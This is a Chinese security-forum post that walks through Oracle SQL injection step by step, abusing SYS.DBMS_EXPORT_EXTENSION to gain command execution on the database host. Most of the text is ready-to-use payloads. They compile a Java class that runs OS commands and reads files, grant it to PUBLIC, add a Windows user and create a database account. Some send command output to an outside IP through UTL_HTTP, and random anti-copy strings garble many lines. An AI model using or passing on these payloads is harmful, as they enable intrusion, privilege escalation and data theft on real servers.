找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 实例演示oracle注入获取cmdshell的全过程
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2671|回复: 0
打印 上一主题 下一主题

实例演示oracle注入获取cmdshell的全过程

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-12-18 12:21:48 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
以下的演示都是在web上的sql plus执行的,在web注入时 把select SYS.DBMS_EXPORT_EXTENSION.....改成 ) M* J/ K/ E! [1 k8 w% o
, b; ^/ e3 k+ f1 _; k" i/ m8 o0 g
  /xxx.jsp?id=1 and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.....) # ?3 D( t1 d) ?+ Z& S
的形式即可。(用" 'a'|| "是为了让语句返回true值) 3 q- D8 D: e! q$ y' o- i" R: s
语句有点长,可能要用post提交。 & l) a* K/ U3 }0 j2 f
以下是各个步骤: & r- ]% A1 T& f9 T  ~
1.创建包
- \  N1 w+ a& u5 i" k% s通过注入 SYS.DBMS_EXPORT_EXTENSION 函数,在oracle上创建Java包LinxUtil,里面两个函数,runCMD用于执行系统命令,readFile用于读取文件:
. X, f9 r  ^: Q" I/xxx.jsp?id=1 and '1'<>'a'||( 6 e9 Z, B7 ~: }' i
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
, W) M8 m8 J# F1 I% l$ n+ G- e9 Ncreate or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
/ a6 k8 u3 _* U2 snew InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}2 W1 m  J, |0 A; g. X# c
}'''';END;'';END;--','SYS',0,'1',0) from dual
  d) h  q  S/ O6 F! j)   N9 A: T% ]1 {
------------------------ " Y: r+ C( w, E/ x
如果url有长度限制,可以把readFile()函数块去掉,即: 8 N8 {/ @* s4 T  Y0 e* q6 L
/xxx.jsp?id=1 and '1'<>'a'||( 2 E3 E8 B$ w' V8 R, m
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''; a+ u8 q8 b( b/ \
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
/ F4 B( D$ E0 X' m# Lnew InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
) D( w( V* V+ g* T}'''';END;'';END;--','SYS',0,'1',0) from dual # n) X7 j! ^$ }& m) R+ J8 F
) * Y8 p/ E6 S( g; M; J
同时把后面步骤 提到的 对readFile()的处理语句去掉。
% x' [; b. I( e0 Y6 F------------------------------
1 P  E$ s, L8 ?) S' [% @2.赋Java权限
$ \5 s! A( b& |4 s7 hselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual9 G2 e0 A: D( ?& W/ X
3.创建函数
; i) k+ H5 f% C" Wselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
! X- @4 }& [( ~6 F7 Ocreate or replace function LinxRunCMD(p_cmd in varchar2)  return varchar2  as language java name ''''''''LinxUtil.runCMD(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual) F5 ^; \# _; b7 d
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
; M2 L1 ~  d; R/ xcreate or replace function LinxReadFile(filename in varchar2)  return varchar2  as language java name ''''''''LinxUtil.readFile(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual( M/ k4 {' u+ E
4.赋public执行函数的权限 : i: q  S3 D4 y
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD to public'''';END;'';END;--','SYS',0,'1',0) from dual
' N7 s* M% ~  S2 C. tselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxReadFile to public'''';END;'';END;--','SYS',0,'1',0) from dual4 a" g7 n3 g7 T1 Z
5.测试上面的几步是否成功 2 F% M7 F8 ]3 O9 a; x
and '1'<>'11'||( 2 \0 \% O/ x8 J+ y
select  OBJECT_ID from all_objects where  object_name ='LINXRUNCMD'
- ^5 Q. {' N+ W4 R$ B& y)   f3 @. v* B: K( c! |
and '1'<>(
2 V0 v3 p, P+ m( z2 ]) N+ Tselect  OBJECT_ID from all_objects where  object_name ='LINXREADFILE' & P4 H6 b0 H9 ^' x1 Y' {
)
, r, y$ `4 l2 @( Q, k3 T$ |6.执行命令: , c  _3 m- j+ s  J
/xxx.jsp?id=1 and '1'<>( 9 F' c. B- e* D0 }
select  sys.LinxRunCMD('cmd /c net user linx /add') from dual
5 w: E- H7 a- s8 U
( H: M; R! E4 X6 ~2 L4 O0 O* a5 L)
& m- L2 w; A. C* `. G* H6 N/xxx.jsp?id=1 and '1'<>( , q4 {1 b/ Y. s1 e$ a$ \0 \
select  sys.LinxReadFile('c:/boot.ini') from dual
* Z3 h# R) {, v) U  R  `9 N( O7 T
). Z, k$ K7 K: }+ I! Z* j9 R
  
: R+ g1 ^1 c4 F+ r, |) m: R2 E# ~注意sys.LinxReadFile()返回的是varchar类型,不能用"and 1<>" 代替 "and '1'<>"。
" ?% M7 Y2 H3 ^, d! I2 S, y- O如果要查看运行结果可以用 union : % K. r; t, c! Q( G& m% U; g
/xxx.jsp?id=1 union select  sys.LinxRunCMD('cmd /c net user linx /add') from dual
. R: E& L7 R% O9 D& [5 `1 X+ \0 k或者UTL_HTTP.request(:
0 V4 g: ?2 @7 K# q4 D  f) z1 V/xxx.jsp?id=1 and '1'<>(
0 ]+ y5 a0 r0 h# V4 MSELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxRunCMD('cmd /c net user aaa /del'),' ','%20'),'\n','%0A')) FROM dual
: E9 S3 ?7 V# f- L) 3 d; V7 ^2 ]3 k& ]8 i/ x& s
/xxx.jsp?id=1 and '1'<>( ' F& J1 z3 Q1 B% n$ K
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxReadFile('c:/boot.ini'),' ','%20'),'\n','%0A')) FROM dual; c: U8 d0 M; T
) 1 s: l0 O9 F8 _4 A
注意:用UTL_HTTP.request时,要用 REPLACE() 把空格、换行符给替换掉,否则会无法提交http request。用utl_encode.base64_encode也可以。
8 R7 ~8 r. g4 p: b3 Z4 |--------------------
5 |( h5 ], g( h. X3 e6.内部变化 + `% {& x. E& O6 v6 v
通过以下命令可以查看all_objects表达改变:
5 T! P' J6 d- k- L' qselect  * from all_objects where  object_name like '%LINX%' or  object_name like '%Linx%'
2 C+ d, P- G/ _2 t: i7.删除我们创建的函数 0 v+ X' u& u+ W8 H: V! ^! O. ^
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''7 c0 _9 X9 t! I# a3 B! U  U
drop function LinxRunCMD  '''';END;'';END;--','SYS',0,'1',0) from dual
: Y6 @9 ?2 D+ @: J# N====================================================
# t: g) R4 M3 b/ ?' B* i8 S全文结束。谨以此文赠与我的朋友。 9 n' `2 [7 q: Q( M% T; L2 V
linx
7 p4 i/ q7 J) M! E0 w( j8 O! D124829445 * I: f4 O$ }, d+ H2 O
2008.1.12 1 ^  g0 f- H  Z0 |, Z
linyujian@bjfu.edu.cn
9 e$ c4 [% k; m$ }, m) ]/ f% @====================================================================== ; C9 F" H5 J. ^" @9 z  {
测试漏洞的另一方法:
( u8 H4 W: o& l; H9 {6 Q创建oracle帐号: 3 y/ P1 Y: g9 n, [/ b
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
; ^  a9 g$ O9 \( C) j$ Y* h- W$ XCREATE USER linxsql IDENTIFIED BY linxsql'''';END;'';END;--','SYS',0,'1',0) from dual
4 |; }# ~' r7 Q$ n# A0 _即: * p8 ]2 C; Q" f7 A& C
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79),chr(66)||chr(65)||chr(82),
5 }  h( p$ ^7 R+ @& A  fchr(68)||chr(66)||chr(77)||chr(83)||chr(95)||chr(79)||chr(85)||chr(84)||chr(80)||chr(85)||chr(84)||chr(34)||chr(46)||chr(80)||chr(85)||chr(84)||chr(40)||chr(58)||chr(80)||chr(49)||chr(41)||chr(59)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(68)||chr(69)||chr(67)||chr(76)||chr(65)||chr(82)||chr(69)||chr(32)||chr(80)||chr(82)||chr(65)||chr(71)||chr(77)||chr(65)||chr(32)||chr(65)||chr(85)||chr(84)||chr(79)||chr(78)||chr(79)||chr(77)||chr(79)||chr(85)||chr(83)||chr(95)||chr(84)||chr(82)||chr(65)||chr(78)||chr(83)||chr(65)||chr(67)||chr(84)||chr(73)||chr(79)||chr(78)||chr(59)||chr(66)||chr(69)||chr(71)||chr(73)||chr(78)||chr(32)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(39)||chr(67)||chr(82)||chr(69)||chr(65)||chr(84)||chr(69)||chr(32)||chr(85)||chr(83)||chr(69)||chr(82)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(32)||chr(73)||chr(68)||chr(69)||chr(78)||chr(84)||chr(73)||chr(70)||chr(73)||chr(69)||chr(68)||chr(32)||chr(66)||chr(89)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(39)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(45)||chr(45),chr(83)||chr(89)||chr(83),0,chr(49),0) from dual
1 \" a! T" }! p  j5 c/ E确定漏洞存在: 6 p" L7 x- }0 ~, {2 u( M: I' h) Y: q
1<>( ) ^( s1 `4 u( X; \
select user_id from all_users where username='LINXSQL' 4 t2 {" O* Q8 j5 A# f- F4 u
)
* Z( y0 `' x: Q9 \& Z" A给linxsql连接权限:
0 Q4 A9 R% K% t$ l# [' Hselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
" t8 T  ], R5 [8 l" a6 yGRANT CONNECT TO linxsql'''';END;'';END;--','SYS',0,'1',0) from dual " Z# ^- G1 B% V7 P$ ?3 V9 v( @
删除帐号:
$ x& i) n, m/ {3 w' h6 G# V# zselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''6 W6 G( z  @2 ~
drop user LINXSQL'''';END;'';END;--','SYS',0,'1',0) from dual
$ B! H! c% s& U: F====================== 1 g7 K, q5 R$ R. a
以下方法创建一个可以执行多语句的函数Linx_query(),执行成功的话返回数值"1",但权限是继承的,可能仅仅是public权限,作用似乎不大,真的要用到话可以考虑grant dba to 当前的User:. q2 J. h/ S8 M' @. p4 L
1.jsp?id=1 and '1'<>( # N7 y' C$ j) C4 ~+ L, B- l: N
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''( {6 |$ W; i% `1 L2 A
create or replace function Linx_query (p varchar2) return number authid current_user is begin execute immediate p; return 1;  end;   '''';END;'';END;--','SYS',0,'1',0) from dual) W5 J2 T2 T( n6 `& }- J
) and ... 1.jsp?id=1 and '1'( select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT.PUT(:P1);EXECUTE IMMEDIATE: M! Q2 i4 e0 T. e7 s6 E
 )
* s) u8 u) d# M: g/ h
! y: V5 R& u( G7 ?) l' l" Q' |! M# b3 H5 q+ C
' t% @$ b7 V: g& B! H+ l( r
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表